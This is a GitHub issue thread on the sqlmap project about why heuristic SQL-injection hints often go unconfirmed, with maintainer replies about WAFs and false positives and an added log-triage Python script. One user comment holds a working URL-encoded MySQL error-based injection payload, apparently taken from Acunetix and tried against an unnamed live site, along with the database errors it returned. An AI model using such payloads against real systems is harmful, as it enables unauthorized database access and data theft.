sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org

heuristic (basic) test #807

Closed WilliJoin closed 10 years ago

WilliJoin commented 10 years ago

Why in 90% of cases is the heuristic (basic) test not wrong, but sqlmap can't find the SQL injection? The SQL injection exists, but sqlmap can't exploit it?

[06:00:45] [INFO] heuristic (basic) test shows that GET parameter 'page' might be injectable (possible DBMS: 'MySQL')
......
[08:22:04] [WARNING] GET parameter 'page' is not injectable

[10:27:45] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[10:27:45] [INFO] testing for SQL injection on GET parameter 'id'
[10:27:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:27:51] [WARNING] reflective value(s) found and filtering out
[10:28:02] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
.....
[10:38:38] [WARNING] false positive or unexploitable injection point detected

stamparm commented 10 years ago

read this: A) "heuristic (basic) test shows that GET parameter 'page' might be injectable" B) "unexploitable injection point detected"

In lots of cases there is a WAF that blocks exploitation. sqlmap can't say that something is vulnerable to SQLi while it's not (at least with the used options/switches).
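As an added illustration of the A) versus B) distinction above (example code, not from the issue and not part of sqlmap itself): a small triage script that reads sqlmap's log lines and reports which parameters the heuristic flagged but sqlmap never confirmed, so a reviewer of scan output treats "might be injectable" and "is vulnerable" as different findings. The sample log is constructed; its timestamps and the third parameter 'cat' are invented.

```python
from __future__ import annotations
import re

# Constructed sample in sqlmap's log format, modelled on this issue's excerpts; times and 'cat' are made up.
SAMPLE_LOG = """\
[06:00:45] [INFO] heuristic (basic) test shows that GET parameter 'page' might be injectable (possible DBMS: 'MySQL')
[08:22:04] [WARNING] GET parameter 'page' is not injectable
[10:27:45] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[10:27:51] [WARNING] reflective value(s) found and filtering out
[10:28:02] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[10:38:38] [WARNING] false positive or unexploitable injection point detected
[11:02:10] [INFO] GET parameter 'cat' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
"""
LINE_RE = re.compile(r"^\[\d\d:\d\d:\d\d\] \[(\w+)\] (.*)$")
PARAM_RE = re.compile(r"\b(GET|POST|Cookie) parameter '([^']+)'")
# (needle, status) in priority order: 'is not injectable' must win over the
# generic 'injectable' wording of the candidate line, so it is listed first.
RULES = [("is not injectable", "not_injectable"), ("false positive or unexploitable", "false_positive"),
         ("is vulnerable", "confirmed"), ("seems to be", "candidate")]

def triage_sqlmap_log(text: str) -> dict[str, dict]:
    """Map 'GET:id' -> {'status', 'hinted', 'reflective'}. Only 'is vulnerable' is
    confirmed; unnamed lines (reflection, false positive) refer to the parameter
    named most recently, which is the order sqlmap prints them in."""
    params: dict[str, dict] = {}
    current = None
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        msg = m.group(2)
        pm = PARAM_RE.search(msg)
        if pm:
            current = f"{pm.group(1)}:{pm.group(2)}"
            params.setdefault(current, {"status": "untested", "hinted": False, "reflective": False})
        if current is None:
            continue  # lines before any parameter is named (banner, target info)
        st = params[current]
        if "heuristic (basic) test shows" in msg:
            st["hinted"], st["status"] = True, "heuristic_hint"
        elif "reflective value(s) found" in msg:
            st["reflective"] = True
        else:
            st["status"] = next((s for needle, s in RULES if needle in msg), st["status"])
    return params

def needs_manual_review(params: dict[str, dict]) -> list[str]:
    # Heuristic said "might be injectable" but sqlmap never confirmed it: the A-without-B case.
    return sorted(p for p, s in params.items() if s["hinted"] and s["status"] != "confirmed")
```

Run it over a real `sqlmap` log (`-v` output or the `.sqlmap/output/<target>/log` file) to get the list of parameters worth a manual look before anyone files a "sqlmap can't exploit it" report.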

stamparm commented 10 years ago

Also, "...in 90% cases heuristic (basic) test is not wrong...". Whenever you find out by yourself MANUALLY that sqlmap is wrong and you have a working SQLI payload, please feel free to report it. Otherwise, please don't open this kind of issue.

WilliJoin commented 10 years ago

Yes, I found it manually: in GET /id=' I get the error

SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'thumb' AND fi_id IS NOT NULL AND ' at line 5
SERVER DATA:

In GET /id='and(select%201%20from(select%20count(*)%2cconcat((select%20concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(51)%2cCHAR(116)%2cCHAR(56)%2cCHAR(103)%2cCHAR(120)%2cCHAR(55)%2cCHAR(97)%2cCHAR(120))%20from%20information_schema.tables%20limit%200%2c1)%2cfloor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and' I get the error

SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '4Cu3t8gx7ax1' for key 'group_key'
SERVER DATA

sqlmap says:
[10:27:45] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[10:27:45] [INFO] testing for SQL injection on GET parameter 'id'
[10:27:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:27:51] [WARNING] reflective value(s) found and filtering out
[10:28:02] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
.....
[10:38:38] [WARNING] false positive or unexploitable injection point detected

stamparm commented 10 years ago

and(select <- this looks like a WAF bypass trick. You've copy/pasted this from somewhere, right?

WilliJoin commented 10 years ago

After an unsuccessful exploit with sqlmap, I posted this /id=' SQL injection in Acunetix and it gave me this 'and(select' payload.

stamparm commented 10 years ago

Usage of ( for WAF bypass is hard to implement as it is context sensitive. Acunetix has a predefined set of payloads to check, so it doesn't have to bother with whether they work properly.